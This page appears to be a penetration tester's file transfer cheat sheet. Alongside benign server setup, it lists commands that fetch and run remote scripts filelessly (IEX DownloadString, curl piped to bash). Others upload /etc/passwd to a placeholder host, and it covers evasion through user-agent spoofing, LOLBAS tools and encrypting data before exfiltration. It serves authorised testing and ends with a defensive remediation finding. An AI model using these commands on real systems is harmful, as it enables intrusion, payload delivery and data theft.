Field Manual

File Transfer Cheat Sheet

4 min read

🛡️ Methodology Checklist

  • Confirm outbound connectivity from target: HTTP, DNS, SMB available?
  • Choose method: PowerShell IWR (Windows) / wget/curl (Linux) / base64 (universal)
  • Stand up HTTP server on attacker: python3 -m http.server 8080
  • Transfer file and verify hash matches on both ends
  • Clean up dropped files after use (OPSEC)
  • Use encrypted transfer (HTTPS) in sensitive environments

🎯 Operational Context

Use when: Transfer blocked or method unclear — quick lookup table to match OS + available tool to transfer method. Think Dumber First: Before trying exotic methods, check: does target have python3? curl? wget? nc? SMB access? Pick the simplest working method. /tmp noexec? Use /dev/shm. Windows without PowerShell? Use certutil. Skip when: N/A — quick reference document.

⚡ Tactical Cheatsheet

CommandTactical Outcome
python3 -m http.server 80Start HTTP server (serve files from current dir)
python3 -m uploadserver [PORT]Start HTTP upload server (accept POST uploads)
sudo impacket-smbserver share . -smb2support -user [USER] -password [PASS]SMB share (authenticated, Win10+)
sudo wsgidav --host=0.0.0.0 --port=80 --root=. --auth=anonymousWebDAV server
sudo systemctl enable ssh && sudo systemctl start sshEnable SSH for SCP transfers
IEX (New-Object Net.WebClient).DownloadString('http://[TARGET_IP]/script.ps1')Fileless PS download + execute
(New-Object Net.WebClient).DownloadFile('http://[TARGET_IP]/file','C:\Users\Public\file')PS download to disk
Invoke-WebRequest http://[TARGET_IP]/file -UserAgent ([Microsoft.PowerShell.Commands.PSUserAgent]::Chrome) -OutFile filePS download with spoofed UA
copy \\[TARGET_IP]\share\file.exeSMB copy (Windows)
net use n: \\[TARGET_IP]\share /user:[USER] [PASS]Mount SMB share as drive
wget http://[TARGET_IP]/file -O /tmp/fileLinux wget download
curl -o /tmp/file http://[TARGET_IP]/fileLinux curl download
curl http://[TARGET_IP]/script.sh | bashLinux fileless execution
exec 3<>/dev/tcp/[TARGET_IP]/80; echo -e "GET /file HTTP/1.1\n\n" >&3; cat <&3 > fileBash /dev/tcp fallback
nc -lvnp [PORT] > fileNetcat receive file
nc -q 0 [TARGET_IP] [PORT] < fileNetcat send file
cat < /dev/tcp/[TARGET_IP]/443 > fileBash receive from nc (no nc on target)
scp user@[TARGET_IP]:/path/file .SCP pull from remote
scp file user@[TARGET_IP]:/path/SCP push to remote
cat file | base64 -w 0; echoEncode for copy-paste (Linux)
echo -n '[BASE64]' | base64 -d > fileDecode copy-pasted base64 (Linux)
[IO.File]::WriteAllBytes("C:\file",[Convert]::FromBase64String("[BASE64]"))Decode base64 to file (Windows)
curl -X POST https://[TARGET_IP]/upload -F 'files=@/etc/passwd' --insecureUpload via HTTPS uploadserver
curl -T /etc/passwd http://[TARGET_IP]:9001/SecretDir/loot.txtUpload via Nginx PUT endpoint
openssl enc -aes256 -iter 100000 -pbkdf2 -in file -out file.encEncrypt before exfil (Linux)
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in file.enc -out fileDecrypt received file (Linux)
certutil.exe -urlcache -split -f http://[TARGET_IP]/file fileLOLBAS download (high detection)
bitsadmin /transfer job /priority foreground http://[TARGET_IP]/file C:\Temp\fileLOLBAS download (stealth)
python3 -c 'import urllib.request;urllib.request.urlretrieve("http://[TARGET_IP]/file","file")'Python download one-liner
php -r '$f=file_get_contents("http://[TARGET_IP]/file");file_put_contents("file",$f);'PHP download one-liner

🔬 Deep Dive & Workflow

Quick Selection Matrix

ScenarioBest Method
HTTP available, Windows targetIWR / WebClient.DownloadFile
HTTP available, Linux targetwget or curl
SMB (445) openimpacket-smbserver + copy
HTTP blockedWebDAV, WinRM PSSession, or Netcat
AppLocker blocks PSLOLBAS (BITSAdmin, Extrac32)
No tools on target/dev/tcp bash or code one-liners
Sensitive dataEncrypt first: OpenSSL (Linux) / AES PS (Windows)
Stealth neededSpoof UA; use BITSAdmin or GfxDownloadWrapper
Copy-paste onlyBase64 encode/decode

Attacker Server Setup Priority

# 1. Simple download server
python3 -m http.server 80
 
# 2. Upload server (for exfil)
python3 -m uploadserver 8000
 
# 3. SMB (for Windows targets)
sudo impacket-smbserver share . -smb2support -user user -password pass
 
# 4. WebDAV (HTTP/S allowed, SMB blocked)
sudo wsgidav --host=0.0.0.0 --port=80 --root=. --auth=anonymous

Exam Mental Checklist

  1. Confirm connectivity: Can victim reach attacker IP? (ping, check VPN tun0 IP)
  2. Try HTTP first — easiest to set up
  3. Check firewall/UA filtering — if blocked, spoof UA or change protocol
  4. If AV kills file — try fileless IEX or encode payload
  5. Verify integritymd5sum / Get-FileHash before executing

🛠️ Troubleshooting & Edge Cases

ProblemCauseFix
Transfer method unknown for targetOS not confirmedCheck: uname -a (Linux) or systeminfo (Windows) first; match to cheatsheet
All HTTP methods blockedEgress filteringTry DNS exfil, ICMP tunnel, or SMB if port 445 open to attack box
File corrupts in transitBinary vs text modeUse base64 encode/decode to ensure safe transfer: base64 file > file.b64 → transfer → base64 -d file.b64 > file
Large file transfer too slowLimited bandwidthSplit: split -b 10m file part_ → transfer parts → cat part_* > file
Transfer detected by DLPContent inspectionEncrypt before transfer: openssl enc -aes-256-cbc -in file -out file.enc -k password

📝 Reporting Trigger

Finding Title: Unrestricted File Transfer Enables Tool and Payload Delivery Impact: Ability to freely transfer files to/from target systems enables payload delivery, data exfiltration, and tool deployment that amplifies post-exploitation capabilities. Root Cause: No egress filtering restricting outbound connections from server workloads. No DLP controls monitoring file transfer activity. Recommendation: Implement egress filtering for server workloads. Deploy DLP to monitor unusual file transfers. Restrict outbound protocols to business-required services only. Monitor for LOL binary network activity.

🔗 Related Nodes

Graph View

Backlinks